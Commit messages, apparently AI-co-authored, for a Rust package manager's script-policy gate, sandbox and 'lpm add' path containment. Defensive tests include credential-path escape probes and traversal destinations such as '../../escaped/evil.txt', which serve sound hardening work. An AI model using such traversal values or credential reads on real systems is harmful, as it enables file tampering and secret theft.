Measured on a 277-package fixture during the 46.0 tag-cut A/B cross-binary validation on 2026-04-23 (main vs phase-46 under `--policy=deny`, same fixture, order-alternated to cancel CF edge warming):
- **Pre-fix:** +32 % median wall-clock regression (+770 ms).
- **Post-fix:** +6–8 % median wall-clock (+170–200 ms), within the ±10 % noise floor the 2026-04-10 baseline doc calls out for this class of measurement.
Net: ~570 ms saved on a 277-pkg fixture. The residual ~200 ms lives in the post-stage `capture_blocked_set_after_install_with_metadata` pass (per-package `compute_script_hash` + `read_install_phase_bodies` on the store tree + trust-snapshot write). That is legitimate Phase 46 security work that wasn't present in main; leaving it for a follow-up perf pass if it ever surfaces as a user complaint.
Shape of the fix: collect the per-package async block into a `Vec<impl Future<Output = Option<(...)>>>` and run them through `futures::future::join_all(...).await`, then fold into `out` sequentially. Order is preserved (join_all is positional), so behaviour is byte-identical to the serial version: this is a pure concurrency win, no logic or output change. `out` is keyed by `(name, version)` so the final map is the same.
Scope: touches `build_blocked_set_metadata` only (call site of the serial loop). Related per-package patterns elsewhere in install.rs that still use serial awaits:
- L1674: minimum-release-age gate (`block_in_place + block_on` per package). Only fires on `!allow_new && !used_lockfile`, so users either hit the cooldown warning once and re-run with `--allow-new`, or bypass it entirely via project config. Not the common path.
- L1803: provenance-drift gate. Gated on `has_rich_approvals = false`, which short-circuits for every project that hasn't yet written any rich-form `trustedDependencies` entries (i.e. everyone today).
Both would benefit from the same fanout treatment but neither triggers for the common `lpm install` invocation the bench measures, so leaving them for a follow-up rather than growing the 46.0 close-out.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
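The "positional fan-out, then sequential fold" shape can be illustrated without external crates. The sketch below is a toy: `join_all_positional` is a busy-polling, std-only stand-in for `futures::future::join_all`, and `Lookup` is a hypothetical hand-written future standing in for the per-package metadata + provenance lookup. None of these names come from install.rs.

```rust
use std::collections::BTreeMap;
use std::future::Future;
use std::pin::Pin;
use std::sync::Arc;
use std::task::{Context, Poll, Wake, Waker};

/// Waker that does nothing; sufficient for a driver that simply re-polls.
struct NoopWake;
impl Wake for NoopWake {
    fn wake(self: Arc<Self>) {}
}

/// Hypothetical per-package lookup. It returns `Pending` for `pending_polls`
/// polls (modelling async boundary crossings), then resolves. An empty name
/// models a package with no metadata.
struct Lookup {
    name: &'static str,
    version: &'static str,
    pending_polls: u32,
}

impl Future for Lookup {
    type Output = Option<((String, String), usize)>;
    fn poll(mut self: Pin<&mut Self>, _cx: &mut Context<'_>) -> Poll<Self::Output> {
        if self.pending_polls > 0 {
            self.pending_polls -= 1;
            return Poll::Pending;
        }
        if self.name.is_empty() {
            return Poll::Ready(None);
        }
        let key = (self.name.to_string(), self.version.to_string());
        Poll::Ready(Some((key, self.name.len())))
    }
}

/// Toy positional join: polls every unfinished future in turn and returns the
/// results in input order, regardless of which future finished first.
fn join_all_positional<F: Future + Unpin>(mut futs: Vec<F>) -> Vec<F::Output> {
    let waker = Waker::from(Arc::new(NoopWake));
    let mut cx = Context::from_waker(&waker);
    let mut slots: Vec<Option<F::Output>> = futs.iter().map(|_| None).collect();
    while slots.iter().any(|slot| slot.is_none()) {
        for (fut, slot) in futs.iter_mut().zip(slots.iter_mut()) {
            if slot.is_none() {
                if let Poll::Ready(value) = Pin::new(fut).poll(&mut cx) {
                    *slot = Some(value);
                }
            }
        }
    }
    slots
        .into_iter()
        .map(|slot| slot.expect("loop exits only when every slot is filled"))
        .collect()
}

/// Fan out all lookups, then fold sequentially into a map keyed by (name, version).
fn build_metadata(packages: &[(&'static str, &'static str, u32)]) -> BTreeMap<(String, String), usize> {
    let futs: Vec<Lookup> = packages
        .iter()
        .map(|&(name, version, pending_polls)| Lookup { name, version, pending_polls })
        .collect();
    let mut out = BTreeMap::new();
    for (key, meta) in join_all_positional(futs).into_iter().flatten() {
        out.insert(key, meta);
    }
    out
}
```

Because results come back in input order and the fold is sequential, the resulting map matches what a serial loop over the same inputs would produce.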
Captures the 2026-04-23 tag-cut bench data alongside the existing 2026-04-10 Phase 32 baseline:
- §12.7 cold-install-triage axes 1/2 (2026-04-22 23:45 reading): triage vs deny both inside ≤5% target per §12.7 v2.11.
- §13.1 A/B cross-binary (main vs phase-46 under --policy=deny): 10-iter order-alternated median = **+7.8%**, within the 10% noise floor called out in the 2026-04-10 baseline.
- Per-stage JSON breakdown: localizes the residual delta to the post-stage capture_blocked_set_after_install_with_metadata pass (legitimate Phase 46 security work, not present in main).
Also documents the two other per-package serial-await hotspots (L1674 minimum-release-age, L1803 provenance-drift) as backlog items; neither triggers on the common `lpm install --allow-new` invocation benchmarked here.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Phase 46.0: tiered script-policy gate (runner vision).
## Highlights
Phase 46.0 ships the four-layer tiered gate defined in `DOCS/new-features/37-rust-client-RUNNER-VISION-phase46.md`:
- **P1**: schema extensions (`script-policy`, `trustedDependencies` rich form with integrity + script_hash + provenance binding), `ScriptPolicyConfig` loader, `--policy=deny|allow|triage` flag, `--yolo` / `--triage` shorthands, trust-snapshot persistence + diff.
- **P2**: static-gate classifier. Regex-based tokenization with green allowlist, red denylist, amber compound-script fallback. ≥500-entry fixture corpus locked; ≥60% green rate on non-adversarial entries; zero false-positive reds.
- **P3**: cooldown (`--min-release-age` + global config key, `minimumReleaseAge` in `package.json`). Wraps the existing `--allow-new` override with a narrower numeric override path.
- **P4**: provenance-drift gate. Fetches Sigstore attestation identities from registry.npmjs.org, compares against approved snapshot, blocks on "provenance dropped" or "identity changed" (publisher rotation). `--ignore-provenance-drift[-all]` overrides for per-package / per-install waivers.
- **P5**: filesystem-scoped sandbox (macOS Seatbelt backend). Approved-script execution inside per-run fileset scope; §12.5 escape test blocked; green-corpora compat green.
- **P6**: tier-aware auto-build (hard-gated on P5). `build::run` auto-approves greens under `triage`; `all_scripted_packages_trusted` is tier-aware; non-TTY autoBuild + triage snapshot test green.
- **P7**: version-diff UI. Behavioral-tag delta render, script-hash drift card on `approve-builds --list`, JSON enrichment (SCHEMA_VERSION 2→3 + per-entry `version_diff`).
- **P9**: close-out. `cold-install-triage` bench green (Axis 1 −15%, Axis 2 +3% vs deny, both ≤5% target). Next.js 16.2.4 red-count = 0 validation on 2026-04-22. Cross-binary A/B on 277-pkg fixture: +7.8% median wall-clock (within the ±10% noise floor).
P8 (LLM triage harness) is **deferred to Phase 46.1**. Hard precondition P5 + P6 are shipped; the LLM detection + constrained verdict schema lands in the follow-up phase.
## Release tag-cut fixes (this session)
- `ed001fa`: bench harness honors `BENCH_WORK_DIR` + `BENCH_PROJECT_DIR` env overrides so running `cold-install-clean` doesn't trigger VS Code's `--no-ignore` rg search storm on the workspace `bench/.work` tree.
- `f19d23e`: `install.rs > build_blocked_set_metadata` fanned out through `futures::future::join_all`. Serial per-package `.await`s on metadata + provenance lookups were adding ~770ms to deny-mode wall-clock on a 277-package tree; fanout drops that to ~200ms (noise floor). Tree output is byte-identical to the serial version.
- `4607f4f`: `bench/baselines/2026-04-23-46.0-macos-arm64.md` records the tag-cut readings and documents two other per-package serial-await hotspots (L1674 minimum-release-age, L1803 provenance-drift) as backlog items.
## Release artifacts
- Workspace `Cargo.toml` (0.22.0 → 0.23.0) + 5 `npm/cli-*/package.json` (same bump).
- `Cargo.lock` auto-synced via `cargo check --workspace` (gitignored; CI re-syncs on its own).
- Local CI gate green:
  - `cargo clippy --workspace --all-targets -- -D warnings`
  - `cargo fmt --check`
  - fancy-regex guard
  - `cargo build --workspace`
  - `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`: 4217/4217
  - `cargo test -p lpm-auth` × 3 under default parallelism: 47/47 each, deterministic
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The test module in `lpm-cert/src/trust.rs` contains a single test that is `#[cfg(target_os = "macos")]`. On Linux CI, the test itself is filtered out at compile time, leaving the enclosing `mod tests` with an empty body and a now-unused `use super::*`, which fails `cargo clippy -- -D warnings` per the `unused-imports` rule.
Local `cargo clippy --workspace --all-targets -- -D warnings` on macOS didn't catch this because the macOS test IS compiled and DOES use the `login_keychain_path` symbol via `super::*`. Only the Linux runner surfaces the drift.
Per the Rust CLI cross-platform hygiene rules in `a-package-manager/CLAUDE.md > Rust CLI Code Rules`:
> Move platform imports into the function body: if a `use`
> import is only needed inside a `#[cfg]` block, put the `use`
> inside that block, not at the top of the file.
Simpler here: qualify `super::login_keychain_path` at the one call site and drop the `use` entirely. The module has no other imports.
No functional change. Pre-existing hygiene bug surfaced by the phase-46 PR run on #7 (tagging v0.23.0 fired the Release workflow from the tag and succeeded; the PR CI event is what runs the Linux lint job).
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…y-test fix)
The §12.5 escape-corpus read tests and the two in-module write/read deny tests in `linux.rs` placed their "forbidden" probe files under `tempfile::tempdir()`. On macOS this resolved to `/var/folders/.../T/.tmpXXX/`, outside every sandbox rule, so Landlock/Seatbelt correctly denied access and the tests asserted that denial.
On Linux, `tempfile::tempdir()` defaults to `/tmp/.tmpXXX/`, and `/tmp` is in the Landlock RW allow list by design (see compat_greens `tmp_scratch_write_shape_succeeds`: many real-world postinstalls hardcode `/tmp/...` paths for intermediate artifacts and the sandbox must not break them). Every probe landed INSIDE the allow list, Landlock correctly permitted it, and the tests then asserted denial → FAIL.
Five failing tests on #7's Linux CI, all of this shape:
- lpm-sandbox::linux::tests::denies_write_outside_allow_list_under_enforce
- lpm-sandbox::linux::tests::enforces_deny_on_read_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_file_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_ssh_credential_shape_path
- lpm-sandbox::escape_corpus::block_read_of_aws_credentials_shape_path
Root cause: the *tests* picked a probe location that on Linux happens to overlap the sandbox's designed-in /tmp RW permission. The sandbox rule is correct (backed by the green-corpus `/tmp`-write test); the test setup was testing the wrong thing.
Fix: relocate every forbidden probe onto `/var/tmp/<unique>`, a standard POSIX scratch dir that's user-writable on both macOS and Linux and is NOT referenced by any rule in describe_rules or the Seatbelt profile. Probes clean up after themselves (`remove_dir_all` at test end); the `!target.exists()` assertion still catches genuine sandbox escapes.
Also uncovered and preserved: the in-module unit test `tmpdir_distinct_from_slash_tmp_gets_its_own_rule` was accidentally deleted in an earlier attempt at this fix. It is restored with the original semantics (additive `(spec.tmpdir, RW)` + blanket `/tmp` rule, both present). The additive behavior is intentional per Phase 46's §9.3 design and required by the compat-greens `/tmp` test.
Ran locally on macOS arm64:
- `cargo clippy --workspace --all-targets -- -D warnings`: clean
- `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`: 4217/4217 pass, 7 skipped (mode-specific)
- `cargo test -p lpm-sandbox`: 72 lib + 7 escape + 7 compat_greens = 86 tests, all green
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two small CI fixes landing atop the 2026-04-23 sandbox probe-path correction (commit 10e75ac):
**1. `lpm-task::filter::eval::tests::perf_eval_glob_200_members_under_500us_per_call`**
Per-op budget test flaked on GitHub Actions Linux runner. Root cause: the `time_per_op` helper returned `total_elapsed_ns / iters` after a SINGLE round of `iters` iterations. A single 500 ms scheduler stall during the 500-iter loop amortized into +1 ms per-op, 2× the 500 µs debug budget. This wasn't a code regression; it was an unreliable measurement on shared hardware.
Changed `time_per_op` to best-of-5 rounds: each round runs `iters_per_round` iterations independently, the minimum round's ns/op is returned. Rationale: a ns/op budget is asking "can this code hit this latency when the scheduler cooperates?" A genuine regression in LPM's own code shifts ALL rounds (so the minimum moves too), whereas a single stall only hurts one round (min unaffected). Best-of-N gives us a regression detector that survives CI without masking actual slowdowns.
All four perf tests (parse, exact-name, glob, closure-with-deps) now share the best-of-5 helper. Error messages updated to say "best-of-5" so the signal is discoverable.
**2. Rustfmt 1.94.0 reflow**
`cargo fmt` on pinned 1.94.0 (the CI toolchain) preferred `.join(format!(...))` chains wrapped differently from the local `rustfmt` default: a harmless whitespace-only diff on `lpm-sandbox/src/linux.rs` and `lpm-sandbox/tests/escape_corpus.rs`. Reformatted to match CI.
Ran locally:
- `rustup run 1.94.0 cargo fmt --check`: clean
- `cargo clippy --workspace --all-targets -- -D warnings`: clean
- `cargo test -p lpm-task filter::eval::tests`: 54 pass
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
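The best-of-N measurement described above can be sketched as follows. This is a minimal illustration assuming a closure-based helper; the real `time_per_op` signature in `lpm-task` is not shown in the commit text, so the parameter names here are hypothetical.

```rust
use std::time::Instant;

/// Runs `rounds` independent rounds of `iters_per_round` calls to `op` and
/// returns the smallest per-op time, in nanoseconds, seen in any round.
/// A one-off scheduler stall inflates a single round and leaves the minimum
/// untouched; a real slowdown in `op` raises every round, including the minimum.
fn time_per_op<F: FnMut()>(rounds: u32, iters_per_round: u32, mut op: F) -> f64 {
    assert!(rounds > 0 && iters_per_round > 0);
    let mut best = f64::INFINITY;
    for _ in 0..rounds {
        let start = Instant::now();
        for _ in 0..iters_per_round {
            op();
        }
        let ns_per_op = start.elapsed().as_nanos() as f64 / f64::from(iters_per_round);
        best = best.min(ns_per_op);
    }
    best
}
```

A budget assertion would then compare `time_per_op(5, iters, ...)` against the threshold and mention "best-of-5" in its failure message.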
tolgaergin added a commit that referenced this pull request on Apr 29, 2026
* phase-60 D2: promote download_tarball_routed helpers to RegistryClient
Behavior-preserving refactor extracting the two private routed-tarball
helpers from install.rs (download_tarball_routed,
download_tarball_streaming_routed) onto RegistryClient as public
methods. Both `lpm install` and the upcoming Phase 60 `lpm add` source-
delivery flow consume the same Custom-route auth-attachment logic.
- crates/lpm-registry/src/client.rs: add public methods
- crates/lpm-cli/src/commands/install.rs: switch all 5 call sites to
the new methods; delete the private helpers; remove the now-unused
DownloadedTarball import
All 602 install + npmrc tests still pass.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.0.e: PackageMetadata::resolve_version_spec helper
Add a three-tier version-spec resolver on PackageMetadata covering
dist-tag → exact-version → semver-range, mirroring the canonical
pattern at install_global.rs:368-405 verbatim.
Pre-Phase-60, `lpm add react@beta`, `next@canary`, `lodash@^4` all
failed because PackageMetadata::version() is a pure HashMap lookup —
none of those literal strings exist as concrete versions. The new
helper closes the gap.
Per D3 (preplan): both parse-failure and no-satisfying-version
return LpmError::Script (matching install_global verbatim) so the
Phase 60.1 migration of the four duplicate sites (install_global,
install, update_global, global) is a true behavior-preserving
refactor.
9 unit tests cover dist-tag (latest/beta/canary), exact match,
caret/tilde range, no-satisfying error, parse-fail error, and
empty-versions error.
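The three-tier order (dist-tag, then exact version, then range) can be sketched as below. This is a deliberately simplified illustration: it handles only caret ranges over plain `major.minor.patch` versions, ignores the special 0.x and prerelease rules of real semver, and returns `String` errors where the commit says the real helper returns `LpmError::Script`. All names other than `resolve_version_spec` are hypothetical.

```rust
use std::collections::BTreeMap;

type Triple = (u64, u64, u64);

/// Parses a plain `major.minor.patch` string; anything else yields `None`.
fn parse_triple(s: &str) -> Option<Triple> {
    let mut parts = s.split('.').map(|p| p.parse::<u64>().ok());
    let triple = (parts.next()??, parts.next()??, parts.next()??);
    if parts.next().is_some() {
        None
    } else {
        Some(triple)
    }
}

fn resolve_version_spec(
    dist_tags: &BTreeMap<&str, &str>,
    versions: &[&str],
    spec: &str,
) -> Result<String, String> {
    // Tier 1: dist-tag such as `latest`, `beta`, `canary`.
    if let Some(version) = dist_tags.get(spec) {
        return Ok(version.to_string());
    }
    // Tier 2: exact published version.
    if versions.contains(&spec) {
        return Ok(spec.to_string());
    }
    // Tier 3: range. Simplified to `^X.Y.Z` = same major, at least X.Y.Z.
    let floor = spec
        .strip_prefix('^')
        .and_then(parse_triple)
        .ok_or_else(|| format!("cannot parse version spec '{}'", spec))?;
    versions
        .iter()
        .filter_map(|v| parse_triple(v).map(|t| (t, *v)))
        .filter(|(t, _)| t.0 == floor.0 && *t >= floor)
        .max_by_key(|(t, _)| *t)
        .map(|(_, v)| v.to_string())
        .ok_or_else(|| format!("no version satisfies '{}'", spec))
}
```

Checking dist-tags first matters because a tag name is never a valid version string, so the exact-version lookup alone can never resolve it.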
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.0+60.1+60.1.5+60.2: lpm add source delivery from any registry
Decouple `lpm add` from LPM-only package identity, mirror install's
full .npmrc setup, switch to file-spool tarball download, add
destination-side path containment, gate dep auto-install on
lpm.config.json presence, and surface external imports for the simple
path. End-to-end flow now works for any package on any registry the
rust client can reach (lpm.dev worker, npmjs.org direct, .npmrc-
declared private registries).
60.0.a + 60.0.b — Identity refactor + drop dotted-name auto-prepend
- New AddTarget enum: Lpm(PackageName) | Npm { spec: String }.
- New resolve_add_target replaces parse_package_ref. No rewriting
outside the @lpm.dev/ scope — `lodash.merge`, `tolga.foo`, etc.
resolve to AddTarget::Npm verbatim. Fixes a long-standing
correctness bug: pre-Phase-60 dotted bare names were silently
rewritten to @lpm.dev/<name> which doesn't exist on lpm.dev.
- All output / log / JSON sites render via target.display() /
target.json_name() — `name.scoped()` no longer used unconditionally.
- Skills branch type-encoded via `let AddTarget::Lpm(pkg) = &target`
pattern, with a why-comment (60.2) explaining the scope gate
(lpm.dev runs LLM scans on shipped skill content; arbitrary npm
packages are not scanned).
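The classification rule in 60.0.a + 60.0.b can be sketched as follows. The enum shape comes from the commit text; the `PackageName` fields, the parsing details, and the choice to treat a malformed `@lpm.dev/` input as an npm spec are assumptions for illustration, and version suffixes are not handled.

```rust
/// Hypothetical stand-in for the real `PackageName` type.
#[derive(Debug, PartialEq)]
struct PackageName {
    owner: String,
    name: String,
}

#[derive(Debug, PartialEq)]
enum AddTarget {
    Lpm(PackageName),
    Npm { spec: String },
}

/// Only inputs inside the `@lpm.dev/` scope become `Lpm`; everything else is
/// passed through verbatim as an npm spec, dotted bare names included.
fn resolve_add_target(input: &str) -> AddTarget {
    if let Some(rest) = input.strip_prefix("@lpm.dev/") {
        if let Some((owner, name)) = rest.split_once('.') {
            if !owner.is_empty() && !name.is_empty() {
                return AddTarget::Lpm(PackageName {
                    owner: owner.to_string(),
                    name: name.to_string(),
                });
            }
        }
    }
    AddTarget::Npm { spec: input.to_string() }
}
```

Encoding the two identities as enum variants is what lets the skills branch use a `let AddTarget::Lpm(pkg) = &target` pattern as its scope gate.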
60.0.c — Mirror install's full .npmrc setup
- Build RouteTable::from_env_and_filesystem before any network call.
- Surface npmrc_warnings (non-JSON) and the strict-ssl=false security
warning (escapes --json). Clone the client with with_tls_overrides
so cafile= / strict-ssl=false take effect on metadata + tarball
fetches. Mirrors install.rs:3295-3445.
60.0.d — Routed metadata + file-spool tarball
- Metadata: AddTarget::Lpm uses get_package_metadata; AddTarget::Npm
uses get_npm_metadata_routed.
- Tarball: client.download_tarball_routed (D2 promoted helper) +
lpm_extractor::extract_tarball_from_file. Bounded memory via
MAX_COMPRESSED_TARBALL_SIZE (500 MB) for free; lpm add typescript
(~22 MB) and worst-case @scope/giant-fixture no longer load the
whole tarball into RAM.
60.0.f — Destination-side path containment (D6)
- New resolve_safe_dest helper canonicalizes target_dir once and
validates every write destination: refuses to follow existing
symlinks, rejects writes whose canonical parent escapes the target
root. Wired into the Step 8 file-copy loop. Closes the threat-model
gap that opened up when add expanded from "trusted lpm.dev
publishers" to "any npm publisher."
60.1 — Dep gate + bare-imports notice (D4)
- Tighten dep gate: `if !no_install_deps && lpm_config.is_some()`.
Simple path is download-manager: copy bytes, no auto-install.
- import_rewriter exports a sibling collect_bare_specifiers fn that
shares an internal SpecifierKind classifier with rewrite_imports
(anti-drift contract — "bare" means the same thing in both places).
- add.rs surfaces the collected externals as a non-JSON notice and
as a `external_imports` array in the JSON output.
60.1.5 — Non-interactive simple-path guard
- `lpm_config.is_none() && target_path.is_none() && (yes || json ||
!is_tty)` errors before the file-copy loop. Heuristically defaulting
components/ for arbitrary 3rd-party source under --yes/--json/non-TTY
is a CI/automation footgun.
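The guard condition above reduces to a small predicate. The sketch below restates it as a standalone function; the function name and the flattened boolean parameters are hypothetical, chosen only to make the truth table testable.

```rust
/// True when `lpm add` should refuse to guess a destination: there is no
/// lpm.config.json, no explicit `--path`, and the run is non-interactive
/// (`--yes`, `--json`, or stdin is not a TTY).
fn simple_path_requires_explicit_path(
    has_lpm_config: bool,
    target_path: Option<&str>,
    yes: bool,
    json: bool,
    is_tty: bool,
) -> bool {
    !has_lpm_config && target_path.is_none() && (yes || json || !is_tty)
}
```

An interactive TTY session without `--yes` or `--json` falls through, since the user can still be prompted for a destination.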
Tests
- 15 unit tests in add.rs (resolve_add_target classification including
the dotted-name regression; resolve_safe_dest contracts including
symlink-refusal on Unix).
- 10 unit tests in import_rewriter.rs (classify_specifier,
collect_bare_specifiers).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.3: integration tests for lpm add simple path + guards + traversal
Three new wiremock-driven integration tests covering the highest-value
end-to-end scenarios for Phase 60:
- add_simple_non_interactive_without_path.rs (4 sub-tests) — proves
the 60.1.5 guard fires for --yes, --json, and non-TTY (stdin from
/dev/null) without --path; positive control with --path succeeds.
No package.json mutation in any failure case.
- add_source_npm_simple.rs (2 sub-tests) — full simple-path pipeline
via wiremock npm metadata + tarball: AddTarget::Npm resolves, file-
spool download, extract, files copied flat (no auto-nest), bare-
imports notice lists react + @radix-ui/react-slot, package.json
NOT mutated, .lpm/skills/ NOT created. JSON sub-test asserts the
package.name uses the npm-style identity (not @lpm.dev/-prefixed)
and the new external_imports array is well-shaped.
- add_path_traversal_dest_escape.rs — proves resolve_safe_dest is
wired into the actual write loop, not just unit-tested in
isolation. Tarball ships an lpm.config.json with files[0].dest =
"../../escaped/evil.txt" — assertion: containment-violation error,
exit non-zero, no file written outside target_dir.
Other 60.3 specced tests are either (i) covered by the unit tests
that landed alongside the implementation (#5 dotted-name, #9 version-
spec, #11 symlink — see preplan v6 audit checklist) or (ii)
deliberately deferred where the underlying machinery is already
test-covered by Phase 58.x install tests (#1 lpm.dev rich, #2 npm
rich, #6 npmrc auth, #7 strict-ssl, #8 missing-var fatal).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.4: README — lpm add now works against any registry
- Update the lpm add one-liner in the Commands list.
- Add a "How lpm add Works" section explaining: source delivery vs.
install, the firm naming rule (@lpm.dev/owner.name only), the rich
vs. simple paths, and the non-interactive --path requirement.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 audit fix: resolve_safe_dest must validate before mkdir
Audit reproduced (with a temp-dir filesystem probe) that the landed
resolve_safe_dest helper still created directories OUTSIDE the
target_dir for two attack vectors before the containment error fired:
1. `dest_rel = "../../escaped/evil.txt"` — `Path::join` resolves
lexically; `dest.parent()` lands outside target; `create_dir_all`
ran before the containment check, leaving `<target>/../escaped/`
on disk even though the file write was correctly blocked.
2. Absolute `dest_rel = "/tmp/elsewhere/evil.txt"` — `Path::join` of
an absolute path returns the absolute path verbatim; `parent =
/tmp/elsewhere/`; `create_dir_all` created it before the
containment check fired.
The original integration test only asserted no escaped FILE existed,
so the directory-side-effect bug passed CI.
Fix
- Reorder resolve_safe_dest so EVERY check that can reject the
destination runs BEFORE any filesystem mutation:
Step 1 (NEW) — reject absolute dest_rel up-front.
Step 2 (NEW) — reject any ParentDir / RootDir / Prefix component.
Step 3 — refuse existing-symlink destinations.
Step 4 (NEW) — pre-mkdir ancestor canonicalization: walk up to the
longest existing ancestor; canonicalize; require it under
target_root_canonical (catches symlinked intermediate dirs).
Step 5 — create_dir_all (NOW safe).
Step 6 — post-mkdir re-canonicalize as TOCTOU defense-in-depth.
The lexical bans in Steps 1-2 kill the entire `../escape` and
absolute-path attack classes before any mkdir runs. The longest-
existing-ancestor walk in Step 4 covers the symlinked-intermediate
case (target/foo → /tmp/elsewhere). Step 6 is paranoia.
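The lexical bans in Steps 1-2 can be sketched with `std::path::Component`. This covers only the pre-filesystem checks; the symlink refusal, ancestor canonicalization, and post-mkdir re-check are out of scope here. The function name and error strings are hypothetical.

```rust
use std::path::{Component, Path};

/// Rejects a relative destination on purely lexical grounds, before any
/// filesystem call: absolute paths, and any `..`, root, or prefix component.
fn reject_lexical_escapes(dest_rel: &str) -> Result<(), String> {
    let path = Path::new(dest_rel);
    // Step 1: absolute destinations would replace the target root when joined.
    if path.is_absolute() {
        return Err(format!("absolute destination rejected: {}", dest_rel));
    }
    // Step 2: ban every component that can move outside the target root.
    for component in path.components() {
        match component {
            Component::ParentDir | Component::RootDir | Component::Prefix(_) => {
                return Err(format!("escaping component rejected: {}", dest_rel));
            }
            Component::CurDir | Component::Normal(_) => {}
        }
    }
    Ok(())
}
```

Because nothing here touches the disk, a rejected destination cannot leave a stray directory behind, which is the property the strengthened tests assert.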
Tests
- Strengthen unit tests:
- resolve_safe_dest_dotdot_in_path_rejected_with_no_external_dir_created
now asserts no escape directory was created.
- resolve_safe_dest_absolute_dest_rejected_with_no_external_dir_created
is new — covers the absolute-path attack.
- resolve_safe_dest_dotdot_in_middle_of_path_also_rejected covers
`foo/../bar.txt` (lexically resolves back inside but still
rejected up-front).
- Extend integration test:
- dest_escape_via_dotdot_is_refused_and_creates_no_external_directory
now snapshots target_dir entries before the run and asserts no
unexpected new top-level entries appeared, plus no escape dir.
- dest_escape_via_absolute_path_is_refused_and_creates_no_external_directory
is new — covers the absolute-path attack at the integration level.
Net: 4923 → 4926 workspace tests; clippy + fmt clean; all green.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request on Apr 30, 2026
…rs/ (Phase 61.1)
The big lever: the isolated linker's per-package wrapper tree moves out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the relayout, `rm -rf node_modules` no longer wipes the entire incremental linker cache, so the warm-install bench (and the user pattern Phase 57.2 surfaced, wiping node_modules after a teammate's lockfile change) actually exercises the incremental linker.
Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..` segment and route through `<project>/.lpm/wrappers/<seg>/...`. Centralized in `LayoutPaths::root_symlink_target()` so the depth math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged: they target the project root, which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged: both endpoints live inside `.lpm/wrappers/` so the relative `../../` shape is preserved.
Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses `pkg.wrapper_segment()` instead of hardcoding `format!("{safe}@{version}")`. Pre-fix, local-source deps with a `bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean helper inside `create_symlink_or_junction`'s Windows arm so the `../.lpm/wrappers/...` shape doesn't embed an unresolved `..` segment in the path handed to `cmd /c mklink /J`.
`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root `create_dir_all` covered both via parent recursion; now they're disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape detection.
Test fixtures migrated to use `LayoutPaths` so they track production semantics on any future shape change.
4949 workspace tests pass; clippy --workspace -D warnings clean; cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
11 tasks
tolgaergin added a commit that referenced this pull request Apr 30, 2026
* feat(lpm-runtime): RuntimeStatus carries resolved managed-runtime bin
`Ready` and `Installed` now carry a `bin_dir: PathBuf` field — the
managed-runtime bin path that `node_bin_dir(&version)` already resolves
inside `ensure_runtime` and would otherwise discard. Downstream callers
(the PATH builder in `lpm-runner/bin_path`) can consume this hint to
skip a redundant `detect_node_version` + `list_installed` pass per
`lpm run` invocation.
For the `Installed` branch, defensively re-stat after install — if the
freshly-installed bin dir vanished mid-call (race / external tampering),
degrade to `NotInstalled` rather than panic.
This is the data-shape change that the rest of Phase 61 Tier 1 builds on.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-runner): 3-state ManagedRuntimeHint + pre-resolved PATH builder
Adds `ManagedRuntimeHint { Bin(PathBuf) | Absent | Unknown }` plus
`build_path_with_bins_pre_resolved(start_dir, hint)`. The existing
public `build_path_with_bins` becomes a thin wrapper that passes
`Unknown` — preserving the silent-detect contract for callers that
don't go through `ensure_runtime` first (rebuild, dlx, hooks,
tools.rs, doctor, orchestrator).
Why three states, not `Option<PathBuf>`:
- `Bin(path)` — caller resolved the managed runtime: use it directly.
- `Absent` — caller called `ensure_runtime` and confirmed there
is no managed runtime to use. PATH builder skips the
silent re-detect entirely (the win on unpinned projects).
- `Unknown` — caller hasn't checked. Falls back to silent detect
(current pre-Phase-61 behavior).
Collapsing `Absent` and `Unknown` into one nullable would force the
silent re-detect on the unpinned-project path — the most common shape.
Two deterministic unit tests cover the contract: `_uses_hinted_bin`
asserts the produced PATH is exactly [nm_bin, hint_bin, ...inherited]
when `Bin(...)` is supplied (uses a non-existent fake path so any
re-stat would fail-loud); `_absent_skips_runtime` asserts the PATH is
exactly [nm_bin, ...inherited]. Both assert full structure rather than
substring presence/absence so they're robust to whatever managed-
runtime fragments the developer's PATH happens to contain.
